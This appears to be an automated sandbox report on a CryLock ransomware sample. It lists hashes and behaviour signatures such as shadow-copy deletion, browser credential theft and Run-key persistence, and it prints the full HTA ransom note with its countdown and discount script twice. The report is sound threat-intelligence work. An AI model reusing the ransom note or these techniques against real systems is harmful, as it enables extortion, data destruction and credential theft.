crylock | 4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2024 10:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
Size

206KB
MD5

2f2d4eb24662c916f822f9c3fd55c9b2
SHA1

9d5bda347f70b8f928803a28782a1018d9f2d0e0
SHA256

4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba
SHA512

1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5
SSDEEP

3072:0bOTRwYckApvw14pcODvX/kyeAYcWNzs2C3Zm4YSYoj1ZYJJCpdXfabI8AKgcJuU:wOsZiKRJWWY1dJJQdHrYuFC

Score

10^/10

crylock credential_access defense_evasion discovery execution impact persistence ransomware spyware stealer

Malware Config

Extracted

Family

crylock

Attributes

emails
[email protected]

[email protected]
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+'     '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

rsa_pubkey.plain

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-3756129449-3121373848-4276368241-1000\how_to_decrypt.hta

Ransom Note

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('October 9 2024 23:01:41'); var discount_date = new Date('October 11 2024 23:01:41'); var end_date = new Date('October 12 2024 23:01:41'); var main_contact = '[email protected]'; var hid = '[E903D8D9-D590400F]'; var second_contact = '[email protected]'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+'     '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

Emails

[email protected]

Signatures

Crylock
Ransomware family, which is a new variant of Cryakl ransomware.
ransomware crylock
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 1 IoCs

description	ioc	Process
File created	\??\c:\users\admin\appdata\roaming\microsoft\word\startup\how_to_decrypt.hta	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E903D8D9-D590400F = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe\" -id \"E903D8D9-D590400F\" -wid \"vis\""	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\633863 = "633863"	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops desktop.ini file(s) 30 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\links\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\documents\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\f:\$recycle.bin\s-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\downloads\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\searches\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\desktop\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\libraries\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\saved games\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\3d objects\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\favorites\links\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\documents\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\downloads\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\onedrive\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\pictures\camera roll\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\$recycle.bin\s-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\pictures\saved pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\accountpictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\contacts\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\favorites\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1740	WMIC.exe
Token: SeSecurityPrivilege	1740	WMIC.exe
Token: SeTakeOwnershipPrivilege	1740	WMIC.exe
Token: SeLoadDriverPrivilege	1740	WMIC.exe
Token: SeSystemProfilePrivilege	1740	WMIC.exe
Token: SeSystemtimePrivilege	1740	WMIC.exe
Token: SeProfSingleProcessPrivilege	1740	WMIC.exe
Token: SeIncBasePriorityPrivilege	1740	WMIC.exe
Token: SeCreatePagefilePrivilege	1740	WMIC.exe
Token: SeBackupPrivilege	1740	WMIC.exe
Token: SeRestorePrivilege	1740	WMIC.exe
Token: SeShutdownPrivilege	1740	WMIC.exe
Token: SeDebugPrivilege	1740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1740	WMIC.exe
Token: SeRemoteShutdownPrivilege	1740	WMIC.exe
Token: SeUndockPrivilege	1740	WMIC.exe
Token: SeManageVolumePrivilege	1740	WMIC.exe
Token: 33	1740	WMIC.exe
Token: 34	1740	WMIC.exe
Token: 35	1740	WMIC.exe
Token: 36	1740	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1740	WMIC.exe
Token: SeSecurityPrivilege	1740	WMIC.exe
Token: SeTakeOwnershipPrivilege	1740	WMIC.exe
Token: SeLoadDriverPrivilege	1740	WMIC.exe
Token: SeSystemProfilePrivilege	1740	WMIC.exe
Token: SeSystemtimePrivilege	1740	WMIC.exe
Token: SeProfSingleProcessPrivilege	1740	WMIC.exe
Token: SeIncBasePriorityPrivilege	1740	WMIC.exe
Token: SeCreatePagefilePrivilege	1740	WMIC.exe
